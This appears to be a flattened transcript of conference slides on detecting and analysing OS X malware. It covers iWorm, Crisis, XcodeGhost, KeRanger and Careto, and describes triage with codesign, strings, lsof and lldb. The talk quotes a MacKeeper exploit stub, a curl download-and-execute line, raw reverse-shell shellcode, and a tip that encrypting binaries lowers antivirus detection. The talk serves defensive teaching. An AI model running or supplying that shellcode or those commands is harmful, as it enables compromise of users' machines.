let's play doctor....by patrick wardle
TRANSCRIPT
LET’S PLAY DOCTOR practical os x malware detection & analysis
@patrickwardle
WHOIS
“leverages the best combina1on of humans and technology to discoversecurity vulnerabili1es in our customers’ web apps, mobile apps, IoTdevicesandinfrastructureendpoints”
@patrickwardle
security for the 21st century
careerhobby
OUTLINESTEPSTOAHAPPIER,HEALTHIER2016
outbreaks
diagnos7cs analysis
health&happiness
virology
PART0X1:OUTBREAKSOVERVIEWOFRECENTOSXMALWARESPECIMENS
MALWAREONOSXYES;ITEXISTSANDISGETTINGMOREPREVALENT
“Itdoesn’tgetPCviruses.AMacisn’tsuscep1bletothethousandsofvirusesplaguingWindows-basedcomputers.”-apple.com(2012)
2014:"nearly1000uniqueaMacksonMacs;25majorfamilies"-kasperksy
2015:"ThemostprolificyearinhistoryforOSXmalware...5xmoreOSXmalwareappearedin2015thanduringthepreviousfiveyearscombined"-bit9
2015:OSXmostvulnerableso@warebyCVEcount-cvedetails
OSX/IWORM‘STANDARD’BACKDOOR,PROVIDINGSURVEY,DOWNLOAD/EXECUTE,ETC.
#fs_usage-w-ffilesys20:28:28.727871open /Library/LaunchDaemons/com.JavaW.plist20:28:28.727890writeB=0x16b
launchdaemon survey download execute
persis7ng
infectedtorrents launchdaemonplist
OSX/CRISIS(RCSMAC)HACKINGTEAM'SIMPLANT;COLLECTALLTHINGS!
launchagent rootkitcomponent
persistence(leakedsourcecode)
intelligencecollec7on
“HackingTeam Reborn; Analysis of an RCS Implant Installer"
OSX/XCODEGHOSTAPPLICATIONINFECTOR
$lessXcode.app/Contents/PlugIns/Xcode3Core.ideplugin/Contents/SharedSupport/Developer/Library/Xcode/Plug-ins/CoreBuildTasks.xcplugin/Contents/Resources/Ld.xcspec ...
Name=ALL_OTHER_LDFLAGS;
DefaultValue="$(LD_FLAGS)$(SECTORDER_FLAGS)$(OTHER_LDFLAGS)$(OTHER_LDFLAGS_$(variant))$(OTHER_LDFLAGS_$(arch))$(OTHER_LDFLAGS_$(variant)_$(arch))$(PRODUCT_SPECIFIC_LDFLAGS) -force_load$(PLATFORM_DEVELOPER_SDK_DIR)/Library/Frameworks/CoreServices.framework/CoreServices";
modifiedLD.xcspec file
source
compileappstore
infected :(
infectedapp appinstalled
found by: ClaudXiao
}OSX/GENIEO(INKEEPR)MOSTPROLIFICOSXADWARE
browserextension(s)fakeinstallers
bundledwithapps
ADs
OSX/BACKDOOR(?)BOT/BACKDOORTHATEXPLOITSMACKEEPER
<script>window.location.href='com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/<BASE_64_ENCODED_STUB>';...
"[a]flawinMacKeeper'sURLhandler implementa1onallowsarbitraryremotecodeexecu1onwhenauservisitsaspeciallycra]edwebpage"-baesystems
exploit & payload
launchagent
curl-A'Safari'-o/Users/Shared/dufhhttp://<redacted>/123/test/qapucin/bieber/210410/cormac.mcr;chmod755/Users/Shared/dufh;cd/Users/Shared;./dufh
shell download executesurvey
OSX/KERANGERFIRST(IN-THE-WILD,FUNCTIONAL)OSXRANSOMWARE
official app website; distributing!
'validly'signed
/Users/*
/Volumes: *.doc, *.jpg, etc
transmissionbt.com
OSX/CARETO('MASK')'CYBERESPIONAGEBACKDOOR'
launch agent
[~/Library/LaunchAgents/com.apple.launchport.plist]
lea rdi, encodedServer ; "\x16d\n~\x1AcM!"... mov rsi, decodedServer call __Dcd
...
mov rdi, decodedServer mov esi, cs:_port call _sbd_connect
$lldbOSX_Careto(lldb)targetcreate"OSX_Careto"Currentexecutablesetto'OSX_Careto'(x86_64).''(lldb)b_DcdBreakpoint1:where=OSX_Careto`_Dcd,
...
$(lldb)x/sdecodedServer0x100102b40:"itunes212.appleupdt.com"
disassembly
debugging (decoding C&C)
encoded strings
phishing/exploits
PART0X2:VIROLOGYSTUDYOFOSXMALWARECHARACTERISTICS&COMMONALITIES
INFECTIONVECTORSMETHOD0X1:VIAUSER-INTERACTION
fakecodecs
fakeinstallers/updates
infectedtorrents
rogue"AV"products???
poor naive users!
INFECTIONVECTORSMETHOD0X2:EXPLOITS
"interested in buying zero-day vulnerabili1es with RCE exploits for the latestversions of ...Safari? ...exploits allow to embed and remote execute custompayloadsanddemonstratemodern[exploita1on]techniquesonOSX" -V.Toropov(emailtohackingteam)
howtherealhackersdoit
} ;OSX x64 reverse tcp shell (131 bytes, shell-storm.org) ;"\x41\xB0\x02\x49\xC1\xE0\x18\x49\x83\xC8\x61\x4C\x89\xC0\x48" + ;"\x31\xD2\x48\x89\xD6\x48\xFF\xC6\x48\x89\xF7\x48\xFF\xC7\x0F" + ;"\x05\x49\x89\xC4\x49\xBD\x01\x01\x11\x5C\xFF\xFF\xFF\xFF\x41" + ;"\xB1\xFF\x4D\x29\xCD\x41\x55\x49\x89\xE5\x49\xFF\xC0\x4C\x89" + ;"\xC0\x4C\x89\xE7\x4C\x89\xEE\x48\x83\xC2\x10\x0F\x05\x49\x83" + ;"\xE8\x08\x48\x31\xF6\x4C\x89\xC0\x4C\x89\xE7\x0F\x05\x48\x83" + ;"\xFE\x02\x48\xFF\xC6\x76\xEF\x49\x83\xE8\x1F\x4C\x89\xC0\x48" + ;"\x31\xD2\x49\xBD\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x49\xC1\xED" + ;"\x08\x41\x55\x48\x89\xE7\x48\x31\xF6\x0F\x05"
PERSISTENCEMANYOPTIONS,FEWUSED
launchdaemons&agentsuserloginitems
browserextensions&plugins
[RSA2015]"Malware Persistence on OS X"
~20 techniques
FEATURESDEPENDENTONTHEGOALSOFTHEMALWARE
[criminal] [espionage]
shell
video
audio
ads
clicks
money
keylogs
surveys downloads
exec's
SUMMARYTHECURRENTSTATEOFOSXMALWARE
persistence
pspbypassself-defense
features
‣wellknownmethods‣majority:launchitems
‣minimalobfusca7on‣trivialtodetect/remove
‣poorlyimplemented‣sufficeforthejob
‣occasionalan7-AV‣nopspdetec7on
stealth
‣'hide'inplainsite‣rootkits?notcommon
infec7on
‣trojans/phishing‣someexploits
PART0X3:DIAGNOSTICSAREYOUINFECTED?
VISUALLYOBSERVABLEINDICATORSMOREOFTENTHANNOT,YOU'RENOTINFECTED...
unlikelymalware possiblymalware
"mycomputerissoslow"
"itkeepscrashing"
ADs
"somanyprocesses"
"therearetonsofpopups"
"mycomputersaysitsinfected
"myhomepageandsearchengineareweird"
most not trivially observable!
VISUALLYOBSERVABLEINDICATORSGENERICALERTSMAYINDICATETHEPRESENCEOFMALWARE
persistence(BlockBlock)networkaccess(LittleSnitch)
suchtoolsdonotattempttodirectlydetectmalwareper-se…
STEP0X1:KNOWNMALWAREANYKNOWNMALWARERUNNINGONYOURSYSTEM?
TaskExplorer(+VirusTotalIntegration)
VT ratios
STEP0X2:SUSPICIOUSPROCESSESANYUNRECOGNIZEDBINARIESRUNNINGONYOURSYSTEM?
unsignedtasks
“globalsearch”for:
3rd-partytasks
unsigned
"apple"
unrecognized(byVT)
suspicious!
+
+
STEP0X3:SUSPICIOUSPERSISTENCEANYUNRECOGNIZEDBINARIESPERSISTINGONYOURSYSTEM?
KnockKnock;enum.persistence
unsigned
"apple"
suspicious!
asuspiciouslaunchitem
unrecognized(byVT)+
+
STEP0X4:NETWORKI/OODDPORTSORUNRECOGNIZEDCONNECTIONS?
#sudolsof-i|grepESTABLISHED
apsd75rootTCP172.16.44.128:49508->17.143.164.32:5223(ESTABLISHED)apsd75rootTCP172.16.44.128:49508->17.143.164.32:5223(ESTABLISHED)com.apple1168userTCP172.16.44.128:49511->bd044252.virtua.com.br:https(ESTABLISHED)JavaW1184rootTCP172.16.44.128:49532->188.167.254.92:51667(ESTABLISHED)
iWorm('JavaW')listeningforattackerconnection
or 'established' for connected sessions
iWormconnectedtoC&Cserver
STEP0X5:SUSPICIOUSKEXTS,HIJACKEDDYLIBS,ETC.COUNTLESSOTHERTHINGSTOLOOKFOR....
uncheck ‘'Show OS Kexts'
anysuspiciouskernelextensions?
hijackeddylibs?
[DefCon2015]"DLL Hijacking on OS X? #@%& Yeah!"
PART0X4:ANALYSISDETERMINEIFSOMETHINGISMALICIOUS....ORNOT!?
CODE-SIGNINGEXAMINETHEBINARY’SCODESIGNATURE
$codesign-dvv/usr/lib/libtidy.A.dylibFormat=Mach-Ouniversal(i386x86_64)
Authority=SoftwareSigningAuthority=AppleCodeSigningCertificationAuthorityAuthority=AppleRootCA
libtidy issignedbyappleproper
codesign-dvvOSX_CaretoOSX_Careto:codeobjectisnotsignedatall
mostmalware;unsigned
signed by apple: not malware!
libtidy dylibflaggedbyVT
usecodesigntodisplayabinary’ssigninginfo
ex:$ codesign -dvv <file>
GOOGLETHEHASHMAY(QUICKLY)TELLYOU;KNOWNGOOD||KNOWNBAD
$md5appleUpdaterMD5(appleUpdater)=2b30e1f13a648cc40c1abb1148cf5088
unknownhash….mightbeodd
‣ 3rd-partybinaries,mayproducezerohitsongoogle
‣ 0%detectiononvirustotaldoesn’tmean100%notmalware
knownhash(OSX/Careto)
STRINGSQUICKLYTRIAGEABINARY’SFUNCTIONALITY
$strings-aOSX_Careto
reverselookupof%sfailed:%sbind():%sconnectingto%s(%s)[%s]onport%uexecuting:%s
cM!M>`W9_c[0;32m
strings;OSX/Careto
networking&execlogic
encodedstrings
$strings-aJavaW$Info:ThisfileispackedwiththeUPXexecutablepacker$Id:UPX3.91Copyright(C)1996-2013theUPXTeam.
strings;iWorm
usewiththe-aflag
packed(UPX)
googleinterestingstrings
FILEATTRIBUTESOSXNATIVELYSUPPORTENCRYPTEDBINARIES
ourhardworkbythesewordsguardedpleasedontsteal(c)AppleC
encryptedwithBlowfish
disassemblingFinder.app
encryp7ngthemalware
$strings-amyMalwareinfectUser:ALOHARSA!
$./protectmyMalwareencrypted'myMalware'
$strings-amyMalwaren^jd[P5{Qr_`EYFaJq07
known malware: ~50% drop VT detection
FILEATTRIBUTESDETECTINGENCRYPTEDBINARIES
//check all load commands for(int i = 0; i<[machoHeader[LOAD_CMDS] count]; i++) { //grab load command loadCommand = [machoHeader[LOAD_CMDS] pointerAtIndex:i]; //check text segment if(0 == strncmp(loadCommand->segname, SEG_TEXT, sizeof(loadCommand->segname)) { //check if segment is protected
if(SG_PROTECTED_VERSION_1 == (loadCommand->flags & SG_PROTECTED_VERSION_1)) { //FILE IS ENCRYPTED
detec7ngencryp7onTaskExplorer
}unsigned
encrypted+
FILEATTRIBUTESMALWAREISOFTENPACKEDTO'HINDER'DETECTION/ANALYSIS
$strings-aJavaWInfo:ThisfileispackedwiththeUPXexecutablepackerhttp://upx.sf.netId:UPX3.09Copyright(C)1996-2013theUPXTeam.AllRightsReserved.
iWorm(JavaW);packed
//count all occurrences for(NSUInteger i = 0; i < length; i++) occurrences[0xFF & (int)data[i]]++; //calc entropy for(NSUInteger i = 0; i < sizeof(occurrences)/sizeof(occurrences[0]); i++) { //add occurrences to entropy if(0 != occurrences[i]) { //calc ratio pX = occurrences[i]/(float)length; //cumulative entropy entropy -= pX*log2(pX); }
TaskExplorer
genericpackerdetectionalgorithm
viewallpackedtasks/dylibs
CLASSDUMPEXTRACTCLASSNAMES,METHODS,&MORE...
$class-dumpRCSMac.app@interface__m_MCore:NSObject{NSString*mBinaryName;NSString*mSpoofedName;}
-(BOOL)getRootThroughSLI;-(BOOL)isCrisisHookApp:(id)arg1;-(BOOL)makeBackdoorResident;- (void)renameBackdoorAndRelaunch;
@end
RCSMac(OSX/Crisis)
$class-dumpInstaller.app@interfaceICDownloader:NSObject<NSURLConnectionDelegate>{NSURL*_URL;NSString*_destPath;longlong_httpStatusCode;NSString*_suggestedName;}
-(void)startDownloading;
@interfaceNSURL(ICEncryptedFileURLProtocol)+(id)fileURLWithURL:(id)arg1;+(id)encryptedFileURLWithURL:(id)arg1;
@end
Adware'Installer'(InstallCore)http://stevenygard.com/projects/class-dump/
DYNAMICFILEI/OQUICKLYDETERMINEBINARIESFILE-RELATEDACTIONS
#fs_usage-w-ffilesystem
open/Users/user/Library/LaunchAgents/com.apple.updater.plistwriteF=2B=0x4a openF=5/Users/Shared/dufh…chmod<rwxr-xr-x>/Users/Shared/dufh
unlink./mackeeperExploiter
filei/o(mackeeperexploiter)
$manfs_usageFS_USAGE(1)BSDGeneralCommandsManual
fs_usage--reportsystemcallsandpagefaultsrelatedtofilesystemactivityinreal-time
fs_usagemanpage
persistenceaslaunchagent(com.apple.updater.plist)
installation(/Users/Shared/dufh)selfdeletion,cleanup
NETWORKI/OGAININSIGHTINTOTHEBINARY'SNETWORKCOMMUNICATIONS
OSX/CaretoinWireshark
note: C&C is (now) offline
oddDNSqueries periodicbeacons (custom)encryptedtraffic
"itunes212.appleupdt.com"
VIRUSTOTALSANDBOXFILEI/O+NETWORKI/O,ANDMORE!
virustotalportal
filei/o(iWorm)
networki/o(iWorm)
"VirusTotal+=MacOSXexecution"blog.virustotal.com/2015/11/virustotal-mac-os-x-execution.html
REVERSINGOBJECTIVE-CUNDERSTANDINGSOMEBASICS...
connectedToInternet(void) proc near
mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString ; "URLWithString:" lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ; objc_msgSend ...
internetcheck(mackeeperexploiter)
arg name (for) objc_msgSend 0 RDI class 1 RSI method name2 RDX 1st argument3 RCX 2nd argument4 R8 3rd argument5 R9 4th argument
objc_msgSendfunction
callingconvention(system v amd64abi)
DECOMPILATIONTHERE’SANAPPFORTHAT!
int connectedToInternet() { rax = [NSURL URLWithString:@"http://www.google.com"]; rdx = rax;
var_38 = [NSData dataWithContentsOfURL:rdx]; if(var_38 != 0x0) { var_1 = 0x1; } else { var_1 = 0x0; } rax = var_1 & 0x1 & 0xff; return rax; }
decompilation;internetcheck(mackeeperexploiter)
connectedToInternet(void) proc near
mov rdi, cs:_OBJC_CLASS_$_NSURL mov rsi, cs:URLWithString_ lea rdx, cfstr_google ; "www.google.com" mov rax, cs:_objc_msgSend_ptr call rax ...
hopper.apphttp://www.hopperapp.com
DEBUGGINGUSINGLLDB;OSX’SDEBUGGER
command description example
r launch (run) the process
b breakpoint on function b system
br s -a <addr> breakpoint on a memory add br s -a 0x10001337
si/ni step into/step over
po print objective-C object po $rax
reg read print all registers
$lldbnewMalware(lldb)targetcreate"/Users/patrick/malware/newMalware"Currentexecutablesetto'/Users/patrick/malware/newMalware'(x86_64).
beginningadebuggingsessionsee: "Gdb to LLDB Command Map"
commonlldbcommands
PART0X5:HEALTH&HAPPINESSHOWDOIPROTECTMYPERSONALMACS?
APPLE'SOSXSECURITYMITIGATIONS?GATEKEEPER,XPROTECT,SIP,CODE-SIGNING,ETAL...
"Security & privacy are fundamental to the design of all ourhardware,so]ware,andservices"-7mcook
‣ "Gatekeeper Exposed"(Shmoocon)
‣ "OS X El Capitan-Sinking the S/h\IP" ‣ "Memory Corruption is for Wussies!" (SysScan)
‣ "Writing Bad@ss OS X Malware" (Blackhat)
‣ "Attacking the XNU Kernel in El Capitan" (BlackHat)
only 4 launch items
no 'java' processes
fully patched OS X
gatekeeper enabled
DEMO(GATEKEEPER BYPASS)
OSXLOCKDOWNHARDENSOSX&REDUCESITSATTACKSURFACE
#./osxlockdown[PASSED]EnableAutoUpdate[PASSED]DisableBluetooth[PASSED]Disableinfraredreceiver[PASSED]DisableAirDrop...osxlockdown0.9FinalScore86%;Passrate:26/30
osxlockdownS.Piper(@0xdabbad00)
github.com/SummitRoute/osxlockdown
“builttoaudit&remediate,securityconfigurationsettingsonOSX10.11"-S.Piper
OSXSECURITYTOOLLITTLESNITCHFIREWALL
“if[LittleSnitch]isfound,themalware[OSX/DevilRobber.A]willskipinstallationandproceedtoexecutethecleansoftware”-fSecure.com
trivialtobypass
securityvulnerabilities?yes, stay tuned!
'snitching
MYPERSONALSECURITYTOOLSOBJECTIVE-SEE,BECAUSE"SHARINGISCARING":)
"Nooneisgoingtoprovideyouaqualityservicefornothing.Ifyou’renotpaying,you’retheproduct."-fSecure
...as they try to sell things!
+ I should write some OS X security tools to protect my Mac ....and share 'em freely :)
SECURITYTOOLSOBJECTIVE-SEE(.COM)
KnockKnock BlockBlock
TaskExplorer
Ostiarius
Hijack Scanner
KextViewr RansomWhere?
CONCLUSIONSWRAPPINGTHISALLUP…
CONCLUSIONS&APPLICATIONMAHALOFORYOURATTENTION...Q&A?
osxmalware(iWorm,Crisis,Genieo,etc.)
learned about: scan & protect!
littlesnitch/firewall
[email protected] @patrickwardle
genericdetection&analysis
credits
- iconmonstr.com - http://wirdou.com/2012/02/04/is-that-bad-doctor/
- thesafemac.com - "Mac OS X & iOS Internals", Jonathan Levin - http://researchcenter.paloaltonetworks.com/2015/09/more-details-on-the-xcodeghost-malware-
and-affected-ios-apps/ - http://baesystemsai.blogspot.ch/2015/06/new-mac-os-malware-exploits-mackeeper.html - http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
images
resources